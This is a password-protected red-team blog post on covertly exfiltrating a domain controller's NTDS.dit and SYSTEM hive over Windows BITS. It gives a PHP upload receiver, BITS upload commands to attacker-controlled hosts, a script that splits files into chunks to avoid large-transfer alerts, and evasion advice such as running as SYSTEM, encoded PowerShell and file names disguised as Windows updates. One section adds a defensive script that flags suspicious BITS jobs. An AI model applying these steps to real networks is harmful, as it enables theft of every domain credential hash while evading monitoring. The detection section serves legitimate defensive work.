This post is password protected for obvious reasons; if you are reading this, you have the password.
Covert Data Exfiltration Using BITS on Windows Domain Controllers
You have an NTDS.dit file and the SYSTEM registry hive, but you need to get them to an external server. The mission here is to not trip monitoring: an SMB session can be tracked and alerted on, so we need to think outside the box and use other Windows technologies that will not raise alarms (with the default configuration).
Disclaimer: This content is intended for authorized red team engagements, security research, or educational purposes only.
Objective: Demonstrate a stealthy method of data exfiltration using the trusted Windows Background Intelligent Transfer Service (BITS), while remaining under the radar of Microsoft Defender and most EDR solutions. Includes full setup on a Kali Linux server.
Why BITS?
BITS is a native Windows component used for background data transfer by services like Windows Update, Defender, and Intune. It operates with low priority and blends in with normal system activity.
Advantages:
- Trusted system component (low alert profile)
- Supports HTTP/S transfers
- Can be throttled or scheduled
- Survives reboots if configured asynchronously
Kali Web Server Setup
Let's first get Kali set up to receive the BITS transfer, which involves installing Apache and PHP, then creating the upload directory and a PHP upload handler.
Install Apache and PHP
sudo apt update
sudo apt install apache2 php libapache2-mod-php -y
Create Upload Directory
sudo mkdir /var/www/html/uploads
sudo chmod 777 /var/www/html/uploads
Create PHP Upload Handler
Create a file /var/www/html/upload.php:
<?php
$uploaddir = 'uploads/';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Success.";
} else {
echo "Upload failed.";
}
?>
Exfiltration on Windows Domain Controller
This uses the BITS service to transfer the zipped "loot" file to our target server, which in turn should not flag or alert in Defender.
Start the transfer stream with BITS
Start-BitsTransfer -Source "C:\Export\loot.zip" `
    -Destination "https://www1.bear.local/upload.php" -TransferType Upload
Advanced Process: Throttled and Asynchronous Upload
$job = Start-BitsTransfer -Source "C:\Export\loot.zip" `
    -Destination "https://www1.bear.local/upload.php" -TransferType Upload -Asynchronous
Set-BitsTransfer -BitsJob $job -Priority Low
Resume-BitsTransfer -BitsJob $job
Cleanup
Get-BitsTransfer | Remove-BitsTransfer
Chunking the File for Covert Upload (to avoid large-file detection)
This splits the file into small pieces to avoid triggering large-transfer alerts and then transfers the chunks; the first script creates the chunked files:
function Split-File($InputFile, $ChunkSizeMB = 1) {
    $chunkSize = $ChunkSizeMB * 1MB
    $buffer = New-Object byte[] $chunkSize
    $stream = [System.IO.File]::OpenRead($InputFile)
    $i = 0
    # Read returns 0 at end of file, which ends the loop
    while (($bytesRead = $stream.Read($buffer, 0, $chunkSize)) -gt 0) {
        $outFile = "$InputFile.part$i"
        # Write only the bytes actually read so the last chunk is not padded
        [System.IO.File]::WriteAllBytes($outFile, $buffer[0..($bytesRead - 1)])
        $i++
    }
    $stream.Close()
}
Split-File -InputFile "C:\ProgramData\loot.zip" -ChunkSizeMB 1
Then you will need to upload each part, chunk by chunk:
Get-ChildItem "C:\ProgramData\loot.zip.part*" | ForEach-Object {
    Start-BitsTransfer -Source $_.FullName `
        -Destination "https://your.domain.com/upload.php" -TransferType Upload
}
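From the defender's side, the pattern above (a burst of short BITS jobs to a host that is not a Microsoft update endpoint) is exactly what a detection should key on. The following is an added example, not code from the original post: a Python triage script run over constructed lines that imitate a TimeCreated|EventID|Message export of the Microsoft-Windows-Bits-Client/Operational log. The export format, the exact event 59 message wording and the allowlist baseline are assumptions to tune against your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed sample export (format assumed: TimeCreated|EventID|Message).
# Event 59 fires when a BITS job starts transferring; it names the job and URL.
SAMPLE_LOG = """\
2024-05-01T09:00:01|59|BITS started the WU Client Download transfer job that is associated with the http://dl.delivery.mp.microsoft.com/filestreamingservice/files/x URL.
2024-05-01T09:02:10|59|BITS started the BITS Transfer transfer job that is associated with the https://www1.bear.local/upload.php URL.
2024-05-01T09:02:11|59|BITS started the BITS Transfer transfer job that is associated with the https://www1.bear.local/upload.php URL.
2024-05-01T09:02:12|59|BITS started the BITS Transfer transfer job that is associated with the https://www1.bear.local/upload.php URL.
2024-05-01T09:02:13|59|BITS started the BITS Transfer transfer job that is associated with the https://www1.bear.local/upload.php URL.
2024-05-01T09:30:00|59|BITS started the Defender update transfer job that is associated with the https://go.microsoft.com/fwlink/x URL.
2024-05-01T11:00:00|59|BITS started the BITS Transfer transfer job that is associated with the https://files.example.org/x URL.
"""

# Assumed baseline of hosts that legitimately appear in BITS logs; extend per site.
ALLOWLIST = ("microsoft.com", "windowsupdate.com", "windows.com")

EVENT59 = re.compile(r"BITS started the (.+?) transfer job that is associated with the (\S+) URL\.")

def parse_events(text):
    """Return (timestamp, job_title, host) for every event 59 line."""
    out = []
    for line in text.splitlines():
        ts, eid, msg = line.split("|", 2)
        m = EVENT59.search(msg) if eid == "59" else None
        if m:
            out.append((datetime.fromisoformat(ts), m.group(1), urlparse(m.group(2)).hostname or ""))
    return out

def is_allowlisted(host):
    """Suffix match so that sub.domain.microsoft.com passes but notmicrosoft.com does not."""
    return any(host == s or host.endswith("." + s) for s in ALLOWLIST)

def triage(events, burst=4, window=300):
    """Flag every job to a non-allowlisted host, plus any such host that receives
    `burst` or more jobs within `window` seconds (the chunked-upload pattern)."""
    by_host, findings = defaultdict(list), []
    for ts, job, host in events:
        if not is_allowlisted(host):
            findings.append(("unknown-host", host, job, ts.isoformat()))
            by_host[host].append(ts)
    for host, times in by_host.items():
        times.sort()
        for i in range(len(times) - burst + 1):
            if (times[i + burst - 1] - times[i]).total_seconds() <= window:
                findings.append(("burst", host, f"{burst}+ jobs in {window}s", times[i].isoformat()))
                break
    return findings
```

The same two checks map directly onto a SIEM rule: alert on BITS-Client event 59 whose URL host is outside the baseline, and raise severity when that host repeats within a short window.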
Security Considerations
- Run scripts as SYSTEM where possible (psexec -s) to avoid user-level logging.
- Use encoded PowerShell blocks or in-memory execution to evade command-line auditing.
- Consider routing the upload through a proxy endpoint for additional obfuscation.
- Avoid obvious filenames like loot.zip; blend in with system or update names, for example windows10.0-kb4100347-v3-x64_8251e1f6e3d760e110b35af950f9acee5f4f6777.msu